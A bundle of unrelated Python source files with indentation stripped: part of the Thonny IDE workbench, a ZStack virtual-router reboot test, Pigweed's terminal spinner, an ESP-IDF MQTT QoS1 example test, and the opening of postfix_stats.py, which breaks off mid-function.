MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to do documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
style = ttk.Style()
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
rowheight = int(treeview_font_size * 1.2 + self.scale(4))
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
rowheight = int(treeview_font_size * 2.0 + self.scale(3))
tk_font.nametofont("TreeviewFont").configure(size=treeview_font_size)
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
button = ttk.Button(
group_frame,
command=handler,
image=image,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(
row=1, column=0, sticky=tk.NSEW, in_=widget.master # type: ignore
)
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
if tester and not tester():
menu.entryconfigure(i, state=tk.DISABLED)
else:
menu.entryconfigure(i, state=tk.NORMAL)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _handle_socket_request(self, client_socket: socket.socket) -> None:
"""runs in separate thread"""
# read the request
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
self._requests_from_socket.put(data)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
def _poll_socket_requests(self) -> None:
"""runs in gui thread"""
try:
while not self._requests_from_socket.empty():
data = self._requests_from_socket.get()
args = ast.literal_eval(data.decode("UTF-8"))
assert isinstance(args, list)
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
self.become_active_window()
finally:
self.after(50, self._poll_socket_requests)
def _on_close(self) -> None:
if not self.get_editor_notebook().check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
tk.Tk.destroy(self)
except tk.TclError:
logging.exception("Error while destroying workbench")
finally:
runner = get_runner()
if runner != None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
test_ping_vms_reboot_vr.py
|
'''
1. Create 2 Test VMs with VR.
2. After 2 VMs created, reboot VR.
3. After VR reboot completed, check 2 VMs status
4. ping VM2 from VM1
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.vm_operations as vm_ops
import threading
import time
_config_ = {
'timeout' : 1000,
'noparallel' : True
}
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def test():
test_util.test_dsc('Create test vm1 and check')
vm1 = test_stub.create_vlan_vm()
test_obj_dict.add_vm(vm1)
test_util.test_dsc('Create test vm2 and check')
vm2 = test_stub.create_vlan_vm()
test_obj_dict.add_vm(vm2)
vm1.check()
vm2.check()
vrs = test_lib.lib_find_vr_by_vm(vm1.vm)
if len(vrs) != 1:
test_util.test_logger('more than 1 VR are found for vm1: %s. Will test the 1st one: %s.' % (vm1.vm.uuid, vr.uuid))
vr = vrs[0]
vr_mgmt_ip = test_lib.lib_find_vr_mgmt_ip(vr)
if not test_lib.lib_check_testagent_status(vr_mgmt_ip):
test_util.test_fail('vr: %s is not reachable, since can not reach its test agent. Give up test and test failure. ' % vr.uuid)
test_lib.lib_install_testagent_to_vr_with_vr_vm(vr)
#Need to put the vr restart into thread. Since vr reboot API is a sync API.
thread = threading.Thread(target=vm_ops.reboot_vm, args=(vr.uuid,))
thread.start()
#check vr vr service port
if not test_lib.lib_wait_target_down(vr_mgmt_ip, '7272', 60):
test_util.test_fail('vr: %s is not shutdown in 60 seconds. Fail to reboot it. ' % vr.uuid)
if not test_lib.lib_wait_target_up(vr_mgmt_ip, '7272', 120):
test_util.test_fail('vr: %s is not startup in 120 seconds. Fail to reboot it. ' % vr.uuid)
#avoid of possible apt conflicting between install testagent and appliancevm
#time.sleep(60)
vm1.check()
vm2.check()
test_util.test_dsc('Ping from vm1 to vm2.')
test_lib.lib_check_ping(vm1.vm, vm2.vm.vmNics[0].ip)
vm1.destroy()
vm2.destroy()
test_util.test_pass('Create vlan VirtualRouter VM (and reboot VR after VM created) Test with snat ping between two VMs Success')
#Will be called only if exception happens in test().
def error_cleanup():
test_lib.lib_error_cleanup(test_obj_dict)
|
spinner.py
|
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Spinner!"""
import contextlib
import os
import sys
import threading
import time
class Spinner(object): # pylint: disable=useless-object-inheritance
"""Spinner!"""
def __init__(self, quiet=False):
self._done = None
self._thread = None
self._quiet = quiet
def _disabled(self):
if os.environ.get('PW_ENVSETUP_DISABLE_SPINNER'):
return True
if os.environ.get('PW_ENVSETUP_QUIET'):
return True
if self._quiet:
return True
if not sys.stdout.isatty():
return True
return False
def __del__(self):
self._done = True
def _spin(self):
i = 0
chars = '|/-\\'
while not self._done:
sys.stdout.write('[{}]'.format(chars[i]))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b\b\b')
i = (i + 1) % len(chars)
def start(self):
if self._disabled():
return
self._done = False
self._thread = threading.Thread(target=self._spin)
self._thread.start()
def stop(self):
if self._disabled():
return
assert self._thread
self._done = True
self._thread.join()
self._thread = None
@contextlib.contextmanager
def __call__(self):
try:
self.start()
yield self
finally:
self.stop()
@contextlib.contextmanager
def pause(self):
try:
self.stop()
yield self
finally:
self.start()
|
mqtt_tcp_example_test.py
|
import os
import re
import socket
import struct
import sys
import time
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
msgid = -1
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def mqqt_server_sketch(my_ip, port):
global msgid
print('Starting the server on {}'.format(my_ip))
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(60)
s.bind((my_ip, port))
s.listen(1)
q,addr = s.accept()
q.settimeout(30)
print('connection accepted')
except Exception:
print('Local server on {}:{} listening/accepting failure: {}'
'Possibly check permissions or firewall settings'
'to accept connections on this address'.format(my_ip, port, sys.exc_info()[0]))
raise
data = q.recv(1024)
# check if received initial empty message
print('received from client {}'.format(data))
data = bytearray([0x20, 0x02, 0x00, 0x00])
q.send(data)
# try to receive qos1
data = q.recv(1024)
msgid = struct.unpack('>H', data[15:17])[0]
print('received from client {}, msgid: {}'.format(data, msgid))
data = bytearray([0x40, 0x02, data[15], data[16]])
q.send(data)
time.sleep(5)
s.close()
print('server closed')
@ttfw_idf.idf_example_test(env_tag='Example_EthKitV1')
def test_examples_protocol_mqtt_qos1(env, extra_data):
global msgid
"""
steps: (QoS1: Happy flow)
1. start the broker broker (with correctly sending ACK)
2. DUT client connects to a broker and publishes qos1 message
3. Test evaluates that qos1 message is queued and removed from queued after ACK received
4. Test the broker received the same message id evaluated in step 3
"""
dut1 = env.get_dut('mqtt_tcp', 'examples/protocols/mqtt/tcp', dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, 'mqtt_tcp.bin')
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('mqtt_tcp_bin_size', '{}KB'.format(bin_size // 1024))
# 1. start mqtt broker sketch
host_ip = get_my_ip()
thread1 = Thread(target=mqqt_server_sketch, args=(host_ip,1883))
thread1.start()
# 2. start the dut test and wait till client gets IP address
dut1.start_app()
# waiting for getting the IP address
try:
ip_address = dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
print('writing to device: {}'.format('mqtt://' + host_ip + '\n'))
dut1.write('mqtt://' + host_ip + '\n')
thread1.join()
print('Message id received from server: {}'.format(msgid))
# 3. check the message id was enqueued and then deleted
msgid_enqueued = dut1.expect(re.compile(r'OUTBOX: ENQUEUE msgid=([0-9]+)'), timeout=30)
msgid_deleted = dut1.expect(re.compile(r'OUTBOX: DELETED msgid=([0-9]+)'), timeout=30)
# 4. check the msgid of received data are the same as that of enqueued and deleted from outbox
if (msgid_enqueued[0] == str(msgid) and msgid_deleted[0] == str(msgid)):
print('PASS: Received correct msg id')
else:
print('Failure!')
raise ValueError('Mismatch of msgid: received: {}, enqueued {}, deleted {}'.format(msgid, msgid_enqueued, msgid_deleted))
if __name__ == '__main__':
test_examples_protocol_mqtt_qos1()
|
postfix_stats.py
|
#!/usr/bin/env python
"""
postfix_stats.py
~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import fileinput
import json
import logging
import re
import SocketServer
import sys
from collections import defaultdict, Iterator
from optparse import OptionParser
from Queue import Queue, Full
from threading import Thread, Lock
logging.basicConfig(level=logging.ERROR)
logger = logging.getLogger('postfix_stats')
handlers = defaultdict(list)
stats = {}
stats['recv'] = {
'relay_status': defaultdict(lambda: defaultdict(int)),
'status': defaultdict(int),
'resp_codes': defaultdict(int),
}
stats['send'] = {
'relay_status': defaultdict(lambda: defaultdict(int)),
'status': defaultdict(int),
'resp_codes': defaultdict(int),
}
stats['in'] = {
'status': defaultdict(int),
'resp_codes': defaultdict(int),
}
stats['relay_clients'] = defaultdict(lambda: defaultdict(int))
stats['clients'] = defaultdict(int)
stats['local'] = defaultdict(int)
local_addresses = {}
class Handler(object):
filter_re = re.compile(r'(?!)')
facilities = None
component = None
handle_lock = Lock()
def __init__(self, *args, **kwargs):
assert isinstance(self.filter_re, re._pattern_type)
self.facilities = set(self.facilities)
self.register(self.facilities)
@classmethod
def parse(self, line):
pline = self.filter_re.match(line['message'])
if pline:
logger.debug(pline.groupdict())
with self.handle_lock:
self.component = line['component']
self.handle(**pline.groupdict())
@classmethod
def handle(self, **kwargs):
raise NotImplementedError()
def register(self, facilities):
facilities = set(facilities)
for facility in facilities:
if self not in handlers[facility]:
handlers[facility].append(self)
self.facilities |= facilities
class BounceHandler(Handler):
facilities = set(['bounce'])
filter_re = re.compile((r'\A(?P<message_id>\w+?): sender non-delivery notification: (?P<bounce_message_id>\w+?)\Z'))
@classmethod
def handle(self, message_id=None, bounce_message_id=None):
pass
class CleanupHandler(Handler):
facilities = set(['cleanup'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): message-id=\<(?P<ext_message_id>.+?)\>\Z')
@classmethod
def handle(self, message_id=None, ext_message_id=None):
pass
class LocalHandler(Handler):
facilities = set(['local'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): to=\<(?P<to_email>.*?)\>, orig_to=\<(?P<orig_to_email>.*?)\>, relay=(?P<relay>.+?), delay=(?P<delay>[0-9\.]+), delays=(?P<delays>[0-9\.\/]+), dsn=(?P<dsn>[0-9\.]+), status=(?P<status>\w+) \((?P<response>.+?)\)\Z')
local_addresses_re = re.compile(r'(?!)')
def __init__(self, local_addresses_re=None, *args, **kwargs):
super(LocalHandler, self).__init__(*args, **kwargs)
if local_addresses_re:
assert isinstance(local_addresses_re, re._pattern_type)
self.__class__.local_addresses_re = local_addresses_re
@classmethod
def handle(self, message_id=None, to_email=None, orig_to_email=None, relay=None, delay=None, delays=None, dsn=None, status=None, response=None):
pemail = self.local_addresses_re.search(to_email)
if pemail:
search = pemail.group(1)
name, count = local_addresses[search]
logger.debug('Local address <%s> count (%s) as "%s"', search, count, name)
stats['local'][name] += 1
if count:
stats['in']['status'][status] += 1
stats['in']['resp_codes'][dsn] += 1
class QmgrHandler(Handler):
facilities = set(['qmgr'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): (?:(?P<removed>removed)|(?:from=\<(?P<from_address>.*?)\>, size=(?P<size>[0-9]+), nrcpt=(?P<nrcpt>[0-9]+) \(queue (?P<queue>[a-z]+)\)))?\Z')
@classmethod
def handle(self, message_id=None, removed=None, from_address=None, size=None, nrcpt=None, queue=None):
pass
class SmtpHandler(Handler):
facilities = set(['smtp', 'error'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): to=\<(?P<to_email>.+?)\>, relay=(?P<relay>.+?), (?:conn_use=(?P<conn_use>\d), )?delay=(?P<delay>[0-9\.]+), delays=(?P<delays>[0-9\.\/]+), dsn=(?P<dsn>[0-9\.]+), status=(?P<status>\w+) \((?P<response>.+?)\)\Z')
@classmethod
def handle(self, message_id=None, to_email=None, relay=None, conn_use=None, delay=None, delays=None, dsn=None, status=None, response=None):
stat = 'recv' if '127.0.0.1' in relay else 'send'
if self.component is None:
stats[stat]['status'][status] += 1
else:
stats[stat]['relay_status'][self.component][status] += 1
stats[stat]['resp_codes'][dsn] += 1
class SmtpdHandler(Handler):
facilities = set(['smtpd'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): client=(?P<client_hostname>[.\w-]+)\[(?P<client_ip>[A-Fa-f0-9.:]{3,39})\](?:, sasl_method=[\w-]+)?(?:, sasl_username=[-_.@\w]+)?(?:, sasl_sender=\S)?(?:, orig_queue_id=\w+)?(?:, orig_client=(?P<orig_client_hostname>[.\w-]+)\[(?P<orig_client_ip>[A-Fa-f0-9.:]{3,39})\])?\Z')
@classmethod
def handle(self, message_id=None, client_hostname=None, client_ip=None, orig_client_hostname=None, orig_client_ip=None):
ip = orig_client_ip or client_ip
if self.component is None:
stats['clients'][ip] += 1
else:
stats['relay_clients'][self.component][ip] += 1
class Parser(Thread):
line_re = re.compile(r'\A(?P<iso_date>\D{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+(?P<source>.+?)\s+(?P<facility>.+?)\[(?P<pid>\d+?)\]:\s(?P<message>.*)\Z')
def __init__(self, lines):
super(Parser, self).__init__()
self.lines = lines
self.daemon = True
self.start()
def run(self):
while True:
line = self.lines.get()
try:
self.parse_line(line)
except Exception, e:
logger.exception('Error parsing line: %s', line)
finally:
self.lines.task_done()
def parse_line(self, line):
pln = self.line_re.match(line)
if pln:
pline = pln.groupdict()
logger.debug(pline)
component, facility = pline['facility'].split('/')
component = component.replace('postfix-', '') if relay_mode else None
pline['component'] = component
for handler in handlers[facility]:
handler.parse(pline)
class ParserPool(object):
def __init__(self, num_parsers):
self.lines = Queue(num_parsers * 1000)
for i in xrange(num_parsers):
logger.info('Starting parser %s', i)
Parser(self.lines)
def add_line(self, line, block=False):
self.lines.put(line, block)
def join(self):
self.lines.join()
class CommandHandler(SocketServer.StreamRequestHandler):
def handle(self):
command = self.rfile.readline().strip()
logger.info('Got command: %s', command)
if command.lower() == 'stats':
